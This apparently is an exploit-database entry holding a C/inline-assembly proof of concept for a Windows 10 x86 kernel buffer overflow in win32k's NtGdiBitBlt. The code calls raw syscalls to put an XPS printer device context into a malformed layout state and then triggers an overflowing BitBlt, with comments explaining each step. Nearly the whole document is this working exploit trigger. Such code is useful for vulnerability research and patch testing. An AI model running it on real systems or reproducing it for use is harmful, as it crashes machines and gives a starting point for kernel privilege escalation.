Windows 10 kernel buffer overflow in NtGdiBitBlt PoC

26 Sep 2015 00:00:00 — Reported by Nils Sommer — Type: zdt

Windows 10 NtGdiBitBlt buffer overflow PoC

/*
 * compile (32-bit x86 cl.exe only: the __asm blocks below are not supported by
 * the x64 compiler, and the hard-coded syscall numbers and syscall-stub address
 * appear to be specific to the targeted Windows 10 x86 build):
 * cl.exe bug474.cpp user32.lib gdi32.lib shell32.lib
 */

#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <time.h>

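/*
 * Create an empty "<name>.txt" in the current directory, open it in Notepad and
 * return the HWND of the resulting Notepad window (the PoC uses it as the
 * source window DC for the BitBlt).
 *
 * name: base file name without extension; also the expected window-title prefix.
 * Returns the window handle, or NULL if the file could not be created, Notepad
 * could not be started, or the window did not appear within the poll limit.
 *
 * Notepad titles the window "<name> - Notepad" or "<name>.txt - Notepad"
 * depending on the Explorer "hide extensions" setting, so both are tried.
 */
HWND notepad(LPCSTR name) {
    char filename[1024], title[1024];
    FILE *f = NULL;

    sprintf_s(filename, sizeof filename, "%s.txt", name);
    if (fopen_s(&f, filename, "w") != 0 || f == NULL) {
        /* fopen_s leaves *f NULL on failure; the original fell through and
         * fclose()'d the NULL stream anyway. */
        printf("[-] failed to create temporary text file\n");
        return NULL;
    }
    fclose(f);

    /* ShellExecute signals failure with a pseudo-HINSTANCE value <= 32. */
    HINSTANCE inst = ShellExecuteA(NULL, "open", "notepad.exe", filename, NULL, SW_SHOW);
    if ((INT_PTR)inst <= 32) {
        printf("[-] failed to start notepad\n");
        return NULL;
    }

    /* Poll for the window with a bound, so a Notepad that never shows up
     * cannot make the PoC busy-spin forever (the original loop had no exit
     * and its trailing "return 0x0" was unreachable). */
    const int max_polls = 600; /* 600 * 50 ms = 30 s */
    for (int i = 0; i < max_polls; i++) {
        HWND hwnd;

        sprintf_s(title, sizeof title, "%s - Notepad", name);
        hwnd = FindWindowA(NULL, title);
        if (hwnd) {
            return hwnd;
        }

        sprintf_s(title, sizeof title, "%s.txt - Notepad", name);
        hwnd = FindWindowA(NULL, title);
        if (hwnd) {
            return hwnd;
        }

        Sleep(50);
    }

    printf("[-] failed to retrieve handle to notepad window\n");
    return NULL;
}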


/*
 * Raw win32k syscall wrapper for NtGdiSetLayout(hdc, d0, d1).
 *
 * Calls into the kernel directly instead of through gdi32.dll, so the three
 * values reach win32k exactly as given (the user-mode wrapper may validate or
 * translate them). d0/d1 are presumably (wox, dwLayout) per the win32k
 * prototype -- confirm against the target build.
 *
 * Mechanism: push the 3 arguments, push one dummy dword (presumably standing
 * in for the return-address slot a real ntdll Nt* stub would occupy), load the
 * syscall number into eax and call through the pointer at 0x7ffe0300 (the
 * SystemCall pointer in KUSER_SHARED_DATA on 32-bit Windows). The stub returns
 * to us without cleaning up, so the 4 dwords pushed here are popped with
 * add esp, 0x10. The kernel's NTSTATUS is left in eax and becomes the return
 * value -- there is no C return statement, which relies on MSVC not touching
 * eax between the __asm block and the epilogue.
 *
 * NOTE(review): 0x1123 is the syscall number for this build only; win32k's
 * table is renumbered between Windows builds, so the PoC is not portable
 * without re-deriving it.
 */
__declspec(noinline) int __stdcall NtGdiSetLayout(HDC hdc, DWORD d0, DWORD d1) {
__asm {
push d1
push d0
push hdc
push 0x0           /* dummy return-address slot */
mov eax, 0x1123    /* build-specific syscall number */
mov edx, 0x7ffe0300
call dword ptr [edx]
add esp, 0x10      /* 3 args + dummy */
}
}

/*
 * Raw win32k syscall wrapper for NtGdiBitBlt, bypassing gdi32.dll's BitBlt so
 * the arguments are passed to the kernel unmodified. Same calling mechanism as
 * NtGdiSetLayout above: arguments pushed right to left, a dummy dword, syscall
 * number in eax, call through the KUSER_SHARED_DATA SystemCall pointer at
 * 0x7ffe0300, caller pops the stack afterwards. Return value is whatever the
 * kernel left in eax (no C return statement).
 *
 * Parameter order follows the win32k prototype as far as visible here:
 * (hdcDst, x, y, cx, cy, hdcSrc, xSrc, ySrc, rop4).
 *
 * NOTE(review): 10 dwords are pushed (9 arguments + dummy) = 0x28 bytes, but
 * 0x30 bytes are popped. win32k's NtGdiBitBlt is documented (e.g. ReactOS)
 * with 11 parameters -- the trailing crBackColor and fl are not pushed here --
 * so the kernel presumably reads those two from whatever sits above this
 * frame, and esp is only rebalanced if MSVC's epilogue restores it from ebp.
 * Confirm the argument count for the target build before reusing this
 * wrapper outside the PoC.
 * NOTE(review): 0x100e is the syscall number for the targeted Windows 10 x86
 * build only.
 */
__declspec(noinline) int __stdcall NtGdiBitBlt(HDC hdc, DWORD dw1, DWORD dw2,DWORD dw3,DWORD dw4,HDC hdc2,DWORD dw6,DWORD dw7, DWORD dw8) {
__asm {
push dw8           /* rop4 */
push dw7
push dw6
push hdc2          /* source DC */
push dw4
push dw3
push dw2
push dw1
push hdc           /* destination DC */
push 0x0           /* dummy return-address slot */
mov eax, 0x100e    /* build-specific syscall number */
mov edx, 0x7ffe0300
call dword ptr [edx]
add esp, 0x30      /* see NOTE(review): pops 12 dwords, 10 were pushed */
}
}
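/*
 * PoC driver. Sequence:
 *   1. Create a printer DC for the "Microsoft XPS Document Writer".
 *   2. Call the raw NtGdiSetLayout syscall on it with the two values from the
 *      original report (0x6d, 0xc5abb63); both lie outside the documented
 *      LAYOUT_* flag range, presumably the trigger state.
 *   3. Open Notepad and take a window DC from it as the BitBlt source.
 *   4. Issue a raw NtGdiBitBlt from the window DC into the printer DC with
 *      rop 0x330008 (NOTSRCCOPY) and the fixed coordinates from the report;
 *      on an affected build this is the kernel buffer overflow (expect a
 *      bugcheck, not a return).
 *
 * Every handle is checked before use: the original passed whatever CreateDC /
 * notepad() / GetDC returned straight into the syscalls, so on a machine
 * without the XPS printer or Notepad it silently exercised a NULL-handle path
 * instead of the bug.
 *
 * argc/argv are unused. Returns 0 if the trigger syscall was issued and the
 * kernel survived, 1 on setup failure.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    (void)argc;
    (void)argv;

    HDC hdc1 = CreateDCA(NULL, "Microsoft XPS Document Writer", NULL, NULL);
    printf("[-] hdc1: %p\n", (void *)hdc1);
    if (hdc1 == NULL) {
        printf("[-] CreateDC failed: is the Microsoft XPS Document Writer installed?\n");
        return 1;
    }

    NtGdiSetLayout(hdc1, 0x6d, 0xc5abb63);

    HWND hwnd1 = notepad("test1");
    printf("[-] hwnd1: %p\n", (void *)hwnd1);
    if (hwnd1 == NULL) {
        DeleteDC(hdc1);
        return 1;
    }

    HDC hdc2 = GetDC(hwnd1);
    printf("[-] hdc2: %p\n", (void *)hdc2);
    if (hdc2 == NULL) {
        printf("[-] GetDC failed\n");
        DeleteDC(hdc1);
        return 1;
    }

    /* Trigger: values are those from the original report, kept verbatim. */
    NtGdiBitBlt(hdc1, 0, 0xae, 0x4c, 0x1a, hdc2, 0xb2, 0x47, 0x330008);

    /* Only reached if the target is not affected. */
    ReleaseDC(hwnd1, hdc2);
    DeleteDC(hdc1);
    return 0;
}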

